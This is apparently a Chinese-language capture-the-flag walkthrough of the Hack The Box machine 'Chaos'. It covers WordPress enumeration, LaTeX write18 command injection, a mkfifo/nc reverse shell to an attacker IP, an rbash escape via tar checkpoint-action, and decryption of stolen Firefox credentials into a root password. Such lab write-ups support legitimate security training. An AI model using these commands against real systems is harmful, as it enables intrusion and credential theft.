靶场攻略 | Chaos (hack the box)

  • A+
所属分类:安全文章

nmap扫描结果:

80/tcp    open     http

|_http-title: Site doesn't have a title (text/html).

110/tcp   open     pop3

143/tcp   open     imap

|_imap-capabilities: LITERAL+ listed more STARTTLS ID LOGIN-REFERRALS IDLE ENABLE post-login capabilities Pre-login IMAP4rev1 OK LOGINDISABLEDA0001 have SASL-IR

|_ssl-date: TLS randomness does not represent time

10000/tcp open     snet-sensor-mgmt

| ssl-cert: Subject: commonName=*/organizationName=Webmin Webserver on chaos

| Not valid before: 2018-10-28T12:45:28

|_Not valid after:  2023-10-27T12:45:28

|_ssl-date: TLS randomness does not represent time


端口对应服务访问:

https://10.10.10.120:10000/ ---->webmin登录 --->默认及常规密码无效--->且错误密码过多被拒绝登录

http://10.10.10.120/wp/wordpress/  --->Wordpress网站

http://10.10.10.120/wp/wordpress/  ---> 密码保护文章

wpscan --url http://10.10.10.120/wp/wordpress/ -e ap -e u得到用户名humanWordPress version 4.9.8


使用 human 解开密码保护文章:

Creds for webmail :username – ayushpassword – jiujitsu
 
使用evolution登录邮箱:得到提示 "You are the password";以及两个文件

靶场攻略 | Chaos (hack the box)

python脚本内容为AES加密,解密:

https://raw.githubusercontent.com/happygirlzt/Cryptography/master/encrypt.py

[email protected]:~$ python encrypt.pyWould you like to (E)ncrypt of (D)ecrypt?: 'D'File to decrypt: 'enim_msg.txt'Password: 'sahay'Done.[email protected]:~$ cat enim_msg.txt_decSGlpIFNhaGF5CgpQbGVhc2UgY2hlY2sgb3VyIG5ldyBzZXJ2aWNlIHdoaWNoIGNyZWF0ZSBwZGYKCnAucyAtIEFzIHlvdSB0b2xkIG1lIHRvIGVuY3J5cHQgaW1wb3J0YW50IG1zZywgaSBkaWQgOikKCmh0dHA6Ly9jaGFvcy5odGIvSjAwX3cxbGxfZjFOZF9uMDdIMW45X0gzcjMKClRoYW5rcywKQXl1c2gK   --- >得到链接:http://chaos.htb/J00_w1ll_f1Nd_n07H1n9_H3r3 --->创建PDF

test1无法生成;但是test2和test3可以


目录扫描发现:

http://chaos.htb/J00_w1ll_f1Nd_n07H1n9_H3r3/doc/latex/adjustbox/  --->latex可能存在命令注入???

immediatewrite18{id}

靶场攻略 | Chaos (hack the box)


反弹shell:###由于latex对 & 等字符解析存在问题;

[方法1]需要对 & ;进行编码

[方法2]使用python反弹shell

[方法3]构造无 &符号nc payload

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 0</tmp/f|nc 10.10.14.67 9999 >/tmp/f

使用前边邮箱账户密码成功登录ayush用户:---> rbash: cd: restricted

绕过rbash限制: 

https://www.hackingarticles.in/multiple-methods-to-bypass-restricted-shell/

https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf

常规方法不能绕过,最终绕过paylaod

tar cf /dev/null rick.tar --checkpoint=1 --checkpoint-action=exec=/bin/bash

[email protected]:/home$ echo $PATHecho $PATH/home/ayush/.app###需要修复路径:export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin


用户目录下发现.mozilla文件夹。切换到该目录并开启SimpleHTTPServer,本机下载改目录下的凭证回来解开

wget http://10.10.10.120:8000/ --recursive


在firefox/bzo7sjt1.default/目录中发现key4.db和logins.json

解密凭证:

https://raw.githubusercontent.com/unode/firefox_decrypt/master/firefox_decrypt.py 

[email protected]kali:~/10.10.10.120:8000/firefox/bzo7sjt1.default$ python firefox_decrypt.py  /home/kali/10.10.10.120:8000/firefox/bzo7sjt1.default2020-04-20 06:05:13,798 - WARNING - profile.ini not found in /home/kali/10.10.10.120:8000/firefox/bzo7sjt1.default2020-04-20 06:05:13,798 - WARNING - Continuing and assuming '/home/kali/10.10.10.120:8000/firefox/bzo7sjt1.default' is a profile locationMaster Password for profile /home/kali/10.10.10.120:8000/firefox/bzo7sjt1.default:Website:   https://chaos.htb:10000Username: 'root'Password: 'Thiv8wrej~'

本文始发于微信公众号(渗透攻击红队):靶场攻略 | Chaos (hack the box)

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: